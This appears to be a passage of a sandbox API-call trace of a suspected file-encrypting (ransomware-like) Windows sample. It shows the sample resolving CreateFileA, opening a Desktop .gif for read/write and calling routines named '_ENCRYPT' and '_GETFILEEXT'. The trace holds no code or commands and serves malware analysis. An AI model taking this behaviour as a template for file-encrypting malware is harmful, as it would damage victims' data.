0x8e1ac0 [0165.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0165.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0165.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0165.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0165.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0165.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0165.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0165.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0165.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0165.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0165.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0165.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0165.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0165.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0165.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0165.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0165.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0165.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0165.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0165.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0165.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0165.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0165.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0165.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0165.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0165.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0165.585] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0165.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0165.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd480, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0165.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0165.585] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0165.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0165.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0165.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0165.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd480, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0165.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0165.586] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0165.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0165.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0165.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0165.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0165.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0165.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif", cchWideChar=63, lpMultiByteStr=0x8db0a8, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif", lpUsedDefaultChar=0x0) returned 63 [0165.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0165.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0165.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0165.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0165.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0165.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0165.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0165.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0165.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0165.586] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\r4ko9w2zwntiqwljh0er.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0165.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0165.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0165.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0165.588] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=63, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0165.588] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=63, lpWideCharStr=0x9c0b78, cchWideChar=63 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif") returned 63 [0165.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0165.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0165.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0165.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0165.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0165.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0165.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0165.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0165.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0165.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0165.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0165.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0165.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0165.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0165.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0165.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0165.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0165.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0165.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0165.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0165.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0165.590] FreeLibrary (hLibModule=0x75990000) returned 1 [0165.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0165.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0165.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0165.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0165.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0165.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0165.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0165.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0165.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0165.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0165.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0165.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0165.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0165.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0165.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0165.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0165.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0165.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0165.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0165.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0165.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0165.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0165.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0165.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0165.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0165.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0165.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0165.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0165.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0165.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0165.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0165.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0165.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0165.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0165.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0165.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0165.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0165.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0165.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0165.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0165.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0165.591] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0165.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0165.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0165.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0165.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0165.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0165.591] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0165.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0165.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0165.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0165.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0165.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0165.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0165.592] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0165.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0165.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0165.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0165.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0165.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0165.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0165.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0165.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0165.592] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0165.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0165.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd348, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0165.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0165.592] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0165.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0165.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0165.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0165.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0165.592] CloseHandle (hObject=0x138) returned 1 [0165.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0165.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0165.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0165.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0165.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0165.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0165.593] FreeLibrary (hLibModule=0x75990000) returned 1 [0165.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0165.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0165.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0165.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0165.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0165.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0165.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0165.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0165.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0165.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0165.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0165.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0165.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0165.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0165.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0165.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0165.593] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0165.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0165.593] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0165.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0165.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0165.593] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0165.593] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0165.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0165.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0165.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0165.594] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0165.594] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0165.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0165.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0165.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0165.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0165.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0165.594] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0165.594] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0165.594] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0165.594] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0165.594] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0165.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0165.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0165.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0165.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0165.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0165.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0165.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0165.594] PeekMessageW 